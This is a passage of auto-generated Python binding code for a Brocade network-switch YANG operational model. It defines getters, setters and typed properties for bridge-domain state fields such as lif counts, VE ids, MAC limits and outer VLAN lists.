'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="active-ac-lif-count", rest_name="active-ac-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)""",
})
self.__active_ac_lif_count = t
if hasattr(self, '_set'):
self._set()
def _unset_active_ac_lif_count(self):
self.__active_ac_lif_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="active-ac-lif-count", rest_name="active-ac-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
def _get_config_ac_lif_count(self):
"""
Getter method for config_ac_lif_count, mapped from YANG variable /bridge_domain_state/bridge_domain_list/config_ac_lif_count (uint16)
YANG Description: config ac lif count
"""
return self.__config_ac_lif_count
def _set_config_ac_lif_count(self, v, load=False):
"""
Setter method for config_ac_lif_count, mapped from YANG variable /bridge_domain_state/bridge_domain_list/config_ac_lif_count (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_config_ac_lif_count is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_config_ac_lif_count() directly.
YANG Description: config ac lif count
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="config-ac-lif-count", rest_name="config-ac-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """config_ac_lif_count must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="config-ac-lif-count", rest_name="config-ac-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)""",
})
self.__config_ac_lif_count = t
if hasattr(self, '_set'):
self._set()
def _unset_config_ac_lif_count(self):
self.__config_ac_lif_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="config-ac-lif-count", rest_name="config-ac-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
def _get_active_vfi_lif_count(self):
"""
Getter method for active_vfi_lif_count, mapped from YANG variable /bridge_domain_state/bridge_domain_list/active_vfi_lif_count (uint16)
YANG Description: active vfi lif count
"""
return self.__active_vfi_lif_count
def _set_active_vfi_lif_count(self, v, load=False):
"""
Setter method for active_vfi_lif_count, mapped from YANG variable /bridge_domain_state/bridge_domain_list/active_vfi_lif_count (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_active_vfi_lif_count is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_active_vfi_lif_count() directly.
YANG Description: active vfi lif count
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="active-vfi-lif-count", rest_name="active-vfi-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """active_vfi_lif_count must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="active-vfi-lif-count", rest_name="active-vfi-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)""",
})
self.__active_vfi_lif_count = t
if hasattr(self, '_set'):
self._set()
def _unset_active_vfi_lif_count(self):
self.__active_vfi_lif_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="active-vfi-lif-count", rest_name="active-vfi-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
def _get_config_vfi_lif_count(self):
"""
Getter method for config_vfi_lif_count, mapped from YANG variable /bridge_domain_state/bridge_domain_list/config_vfi_lif_count (uint16)
YANG Description: config vfi lif count
"""
return self.__config_vfi_lif_count
def _set_config_vfi_lif_count(self, v, load=False):
"""
Setter method for config_vfi_lif_count, mapped from YANG variable /bridge_domain_state/bridge_domain_list/config_vfi_lif_count (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_config_vfi_lif_count is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_config_vfi_lif_count() directly.
YANG Description: config vfi lif count
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="config-vfi-lif-count", rest_name="config-vfi-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """config_vfi_lif_count must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="config-vfi-lif-count", rest_name="config-vfi-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)""",
})
self.__config_vfi_lif_count = t
if hasattr(self, '_set'):
self._set()
def _unset_config_vfi_lif_count(self):
self.__config_vfi_lif_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="config-vfi-lif-count", rest_name="config-vfi-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
def _get_local_switching(self):
"""
Getter method for local_switching, mapped from YANG variable /bridge_domain_state/bridge_domain_list/local_switching (boolean)
YANG Description: local switching
"""
return self.__local_switching
def _set_local_switching(self, v, load=False):
"""
Setter method for local_switching, mapped from YANG variable /bridge_domain_state/bridge_domain_list/local_switching (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_local_switching is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_local_switching() directly.
YANG Description: local switching
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="local-switching", rest_name="local-switching", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """local_switching must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="local-switching", rest_name="local-switching", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)""",
})
self.__local_switching = t
if hasattr(self, '_set'):
self._set()
def _unset_local_switching(self):
self.__local_switching = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="local-switching", rest_name="local-switching", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
def _get_block_bpdu(self):
"""
Getter method for block_bpdu, mapped from YANG variable /bridge_domain_state/bridge_domain_list/block_bpdu (boolean)
YANG Description: block bpdu
"""
return self.__block_bpdu
def _set_block_bpdu(self, v, load=False):
"""
Setter method for block_bpdu, mapped from YANG variable /bridge_domain_state/bridge_domain_list/block_bpdu (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_block_bpdu is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_block_bpdu() directly.
YANG Description: block bpdu
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="block-bpdu", rest_name="block-bpdu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """block_bpdu must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="block-bpdu", rest_name="block-bpdu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)""",
})
self.__block_bpdu = t
if hasattr(self, '_set'):
self._set()
def _unset_block_bpdu(self):
self.__block_bpdu = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="block-bpdu", rest_name="block-bpdu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
def _get_bd_type(self):
"""
Getter method for bd_type, mapped from YANG variable /bridge_domain_state/bridge_domain_list/bd_type (uint16)
YANG Description: bd type
"""
return self.__bd_type
def _set_bd_type(self, v, load=False):
"""
Setter method for bd_type, mapped from YANG variable /bridge_domain_state/bridge_domain_list/bd_type (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_bd_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bd_type() directly.
YANG Description: bd type
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="bd-type", rest_name="bd-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bd_type must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="bd-type", rest_name="bd-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)""",
})
self.__bd_type = t
if hasattr(self, '_set'):
self._set()
def _unset_bd_type(self):
self.__bd_type = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="bd-type", rest_name="bd-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
def _get_ve_ifindex(self):
"""
Getter method for ve_ifindex, mapped from YANG variable /bridge_domain_state/bridge_domain_list/ve_ifindex (uint32)
YANG Description: ve_ifindex
"""
return self.__ve_ifindex
def _set_ve_ifindex(self, v, load=False):
"""
Setter method for ve_ifindex, mapped from YANG variable /bridge_domain_state/bridge_domain_list/ve_ifindex (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_ve_ifindex is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ve_ifindex() directly.
YANG Description: ve_ifindex
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="ve-ifindex", rest_name="ve-ifindex", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ve_ifindex must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="ve-ifindex", rest_name="ve-ifindex", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)""",
})
self.__ve_ifindex = t
if hasattr(self, '_set'):
self._set()
def _unset_ve_ifindex(self):
self.__ve_ifindex = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="ve-ifindex", rest_name="ve-ifindex", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
def _get_ve_id(self):
"""
Getter method for ve_id, mapped from YANG variable /bridge_domain_state/bridge_domain_list/ve_id (uint32)
YANG Description: ve_id
"""
return self.__ve_id
def _set_ve_id(self, v, load=False):
"""
Setter method for ve_id, mapped from YANG variable /bridge_domain_state/bridge_domain_list/ve_id (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_ve_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ve_id() directly.
YANG Description: ve_id
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="ve-id", rest_name="ve-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ve_id must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="ve-id", rest_name="ve-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)""",
})
self.__ve_id = t
if hasattr(self, '_set'):
self._set()
def _unset_ve_id(self):
self.__ve_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="ve-id", rest_name="ve-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
def _get_pw_profile(self):
"""
Getter method for pw_profile, mapped from YANG variable /bridge_domain_state/bridge_domain_list/pw_profile (string)
YANG Description: pw_profile
"""
return self.__pw_profile
def _set_pw_profile(self, v, load=False):
"""
Setter method for pw_profile, mapped from YANG variable /bridge_domain_state/bridge_domain_list/pw_profile (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_pw_profile is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_pw_profile() directly.
YANG Description: pw_profile
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="pw-profile", rest_name="pw-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """pw_profile must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="pw-profile", rest_name="pw-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='string', is_config=False)""",
})
self.__pw_profile = t
if hasattr(self, '_set'):
self._set()
def _unset_pw_profile(self):
self.__pw_profile = YANGDynClass(base=unicode, is_leaf=True, yang_name="pw-profile", rest_name="pw-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='string', is_config=False)
def _get_mac_limit(self):
"""
Getter method for mac_limit, mapped from YANG variable /bridge_domain_state/bridge_domain_list/mac_limit (uint16)
YANG Description: mac_limit
"""
return self.__mac_limit
def _set_mac_limit(self, v, load=False):
"""
Setter method for mac_limit, mapped from YANG variable /bridge_domain_state/bridge_domain_list/mac_limit (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_mac_limit is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mac_limit() directly.
YANG Description: mac_limit
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="mac-limit", rest_name="mac-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mac_limit must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="mac-limit", rest_name="mac-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)""",
})
self.__mac_limit = t
if hasattr(self, '_set'):
self._set()
def _unset_mac_limit(self):
self.__mac_limit = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="mac-limit", rest_name="mac-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
def _get_statistics(self):
"""
Getter method for statistics, mapped from YANG variable /bridge_domain_state/bridge_domain_list/statistics (boolean)
YANG Description: statistics
"""
return self.__statistics
def _set_statistics(self, v, load=False):
"""
Setter method for statistics, mapped from YANG variable /bridge_domain_state/bridge_domain_list/statistics (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_statistics is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_statistics() directly.
YANG Description: statistics
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="statistics", rest_name="statistics", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """statistics must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="statistics", rest_name="statistics", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)""",
})
self.__statistics = t
if hasattr(self, '_set'):
self._set()
def _unset_statistics(self):
self.__statistics = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="statistics", rest_name="statistics", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
def _get_mac_addr_withdrawal(self):
"""
Getter method for mac_addr_withdrawal, mapped from YANG variable /bridge_domain_state/bridge_domain_list/mac_addr_withdrawal (boolean)
YANG Description: mac address withdrawal
"""
return self.__mac_addr_withdrawal
def _set_mac_addr_withdrawal(self, v, load=False):
"""
Setter method for mac_addr_withdrawal, mapped from YANG variable /bridge_domain_state/bridge_domain_list/mac_addr_withdrawal (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_mac_addr_withdrawal is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mac_addr_withdrawal() directly.
YANG Description: mac address withdrawal
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="mac-addr-withdrawal", rest_name="mac-addr-withdrawal", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mac_addr_withdrawal must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mac-addr-withdrawal", rest_name="mac-addr-withdrawal", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)""",
})
self.__mac_addr_withdrawal = t
if hasattr(self, '_set'):
self._set()
def _unset_mac_addr_withdrawal(self):
self.__mac_addr_withdrawal = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mac-addr-withdrawal", rest_name="mac-addr-withdrawal", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
def _get_mct_enabled(self):
"""
Getter method for mct_enabled, mapped from YANG variable /bridge_domain_state/bridge_domain_list/mct_enabled (boolean)
YANG Description: mct enabled
"""
return self.__mct_enabled
def _set_mct_enabled(self, v, load=False):
"""
Setter method for mct_enabled, mapped from YANG variable /bridge_domain_state/bridge_domain_list/mct_enabled (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_mct_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mct_enabled() directly.
YANG Description: mct enabled
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="mct-enabled", rest_name="mct-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mct_enabled must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mct-enabled", rest_name="mct-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)""",
})
self.__mct_enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_mct_enabled(self):
self.__mct_enabled = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mct-enabled", rest_name="mct-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
def _get_description(self):
"""
Getter method for description, mapped from YANG variable /bridge_domain_state/bridge_domain_list/description (string)
YANG Description: bridge domain specific description
"""
return self.__description
def _set_description(self, v, load=False):
"""
Setter method for description, mapped from YANG variable /bridge_domain_state/bridge_domain_list/description (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_description is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_description() directly.
YANG Description: bridge domain specific description
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="description", rest_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """description must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="description", rest_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='string', is_config=False)""",
})
self.__description = t
if hasattr(self, '_set'):
self._set()
def _unset_description(self):
self.__description = YANGDynClass(base=unicode, is_leaf=True, yang_name="description", rest_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='string', is_config=False)
def _get_outer_vlan_list(self):
"""
Getter method for outer_vlan_list, mapped from YANG variable /bridge_domain_state/bridge_domain_list/outer_vlan_list (list)
YANG Description: bd_vlan_tag_info
"""
return self.__outer_vlan_list
def _set_outer_vlan_list(self, v, load=False):
"""
Setter method for outer_vlan_list, mapped from YANG variable /bridge_domain_state/bridge_domain_list/outer_vlan_list (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_outer_vlan_list is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_outer_vlan_list() directly.
YANG Description: bd_vlan_tag_info
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("outer_vlan",outer_vlan_list.outer_vlan_list, yang_name="outer-vlan-list", rest_name="outer-vlan-list", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='outer-vlan', extensions={u'tailf-common': {u'callpoint': u'nsm-bd-vlan-tag-info', u'cli-suppress-show-path': None}}), is_container='list', yang_name="outer-vlan-list", rest_name="outer-vlan-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'nsm-bd-vlan-tag-info', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """outer_vlan_list must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("outer_vlan",outer_vlan_list.outer_vlan_list, yang_name="outer-vlan-list", rest_name="outer-vlan-list", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='outer-vlan', extensions={u'tailf-common': {u'callpoint': u'nsm-bd-vlan-tag-info', u'cli-suppress-show-path': None}}), is_container='list', yang_name="outer-vlan-list", rest_name="outer-vlan-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'nsm-bd-vlan-tag-info', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='list', is_config=False)""",
})
self.__outer_vlan_list = t
if hasattr(self, '_set'):
self._set()
def _unset_outer_vlan_list(self):
self.__outer_vlan_list = YANGDynClass(base=YANGListType("outer_vlan",outer_vlan_list.outer_vlan_list, yang_name="outer-vlan-list", rest_name="outer-vlan-list", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='outer-vlan', extensions={u'tailf-common': {u'callpoint': u'nsm-bd-vlan-tag-info', u'cli-suppress-show-path': None}}), is_container='list', yang_name="outer-vlan-list", rest_name="outer-vlan-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'nsm-bd-vlan-tag-info', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='list', is_config=False)
bd_id = __builtin__.property(_get_bd_id)
vc_id = __builtin__.property(_get_vc_id)
active_ac_lif_count = __builtin__.property(_get_active_ac_lif_count)
config_ac_lif_count = __builtin__.property(_get_config_ac_lif_count)
active_vfi_lif_count = __builtin__.property(_get_active_vfi_lif_count)
config_vfi_lif_count = __builtin__.property(_get_config_vfi_lif_count)
local_switching = __builtin__.property(_get_local_switching)
block_bpdu = __builtin__.property(_get_block_bpdu)
bd_type = __builtin__.property(_get_bd_type)
ve_ifindex = __builtin__.property(_get_ve_ifindex)
ve_id = __builtin__.property(_get_ve_id)
pw_profile = __builtin__.property(_get_pw_profile)
mac_limit = __builtin__.property(_get_mac_limit)
